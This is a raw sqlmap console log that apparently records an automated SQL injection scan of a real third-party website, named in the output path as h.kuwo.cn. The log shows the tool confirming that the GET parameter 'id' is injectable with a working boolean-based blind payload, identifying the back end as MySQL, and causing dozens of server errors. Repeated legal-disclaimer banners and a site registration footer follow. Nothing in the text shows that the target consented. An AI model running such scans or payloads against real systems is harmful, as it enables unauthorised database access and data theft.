sqlmap/1.0-dev – automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:13:15
[13:13:15] [INFO] testing connection to the target url
[13:13:15] [INFO] testing if the url is stable, wait a few seconds
[13:13:16] [INFO] url is stable
[13:13:16] [INFO] testing if GET parameter 'id' is dynamic
[13:13:17] [WARNING] GET parameter 'id' appears to be not dynamic
[13:13:17] [WARNING] reflective value(s) found and filtering out
[13:13:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[13:13:17] [INFO] testing for SQL injection on GET parameter 'id'
[13:13:17] [INFO] testing 'AND boolean-based blind – WHERE or HAVING clause'
[13:13:19] [INFO] GET parameter 'id' is 'AND boolean-based blind – WHERE or HAVING clause' injectable
[13:13:19] [INFO] testing 'MySQL >= 5.0 AND error-based – WHERE or HAVING clause'
[13:13:19] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:13:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[13:13:24] [INFO] testing 'MySQL UNION query (NULL) – 1 to 20 columns'
[13:13:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[13:13:30] [INFO] testing 'Generic UNION query (NULL) – 1 to 20 columns'
[13:13:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 55 HTTP(s) requests:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=32 AND 5283=5283
—
[13:13:38] [INFO] testing MySQL
[13:13:39] [INFO] confirming MySQL
[13:13:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.2
[13:13:40] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) – 48 times
[13:13:40] [INFO] fetched data logged to text files under 'C:Usersdell-pcAppDataLocalTempHZ$D07~1.789HZ$D07~1.790SQLMAP~1Binoutputh.kuwo.cn'
[*] shutting down at 13:13:40
sqlmap/1.0-dev – automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
sqlmap/1.0-dev – automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
京公网安备 11010802041100号